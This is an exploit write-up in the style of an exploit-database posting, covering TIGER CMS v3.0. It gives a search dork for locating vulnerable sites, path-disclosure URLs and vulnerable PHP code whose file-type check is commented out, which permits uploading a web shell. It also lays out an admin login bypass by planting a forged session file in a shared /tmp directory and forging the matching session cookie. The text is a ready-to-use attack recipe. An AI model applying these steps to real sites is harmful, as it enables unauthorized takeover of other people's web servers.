==========================================
TIGER CMS <= v3.0 Bypass admin / get shell
==========================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com


Product : TIGER CMS
Vesrion : v3.0
Site : http://tigercms.com/
Dork:"Powered by TIGER CMS v3.0"


Path Disclosure

Sample : http://bobruisk.name/admin/engine/modules/uploads/

Usage:


http://site.com/path/admin/engine/modules/[module_name]

Standard modules, which are suitable for this purpose:

uploads
content
links
metatags
news
pass
templates

Filling an arbitrary file
Unclear why, but the fault of all - 2  default lines.

PHP code:

$type = strtolower(substr($filename, 1 + strrpos($filename, "."))); 
            //$types_ok = array("jpg", "bmp", "gif", "png"); 
            //if(!in_array($type, $types_ok)) $Validate->Locate("javascript:window.close();", 0, 1, "Неверный формат файла."); 

            $new_name = 'tiger-'.time().'.'.$type; 
            $a = copy($file, "../uploads/".$new_name); 
            $path_all = getenv("SERVER_NAME"); 

Example:

http://site.com/path/admin/?task=uploads&sub_task=add


Bypass authentication to the admin.

Need:

Shell on the neighboring site
Access to write to the / tmp

Vulnerable code:

admin/login/login2.php

PHP code:

$_SESSION['user_id_admin'] = $id_admin; 
             $Admins->SuccessAuth($login); 


For a successful login, we will need to login admin. Venture to suggest that it is "admin"

Represents sesiyu:

Name: sess_0526152ea0fed5dbbfca86639e0f6fa7

Contents:

user_id_admin | s: 1: "1";

Keeping in / tmp
Do not forget to right 777!
Next forges cookies in your browser:

PHPSESSID=0526152ea0fed5dbbfca86639e0f6fa7

	
Go:

http://site.com/path/admin/, successfully passed authentication pour shell as described above.


ThE End =]  Visit my proj3ct  :

http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net

# ~  - [ [ : Inj3ct0r : ] ]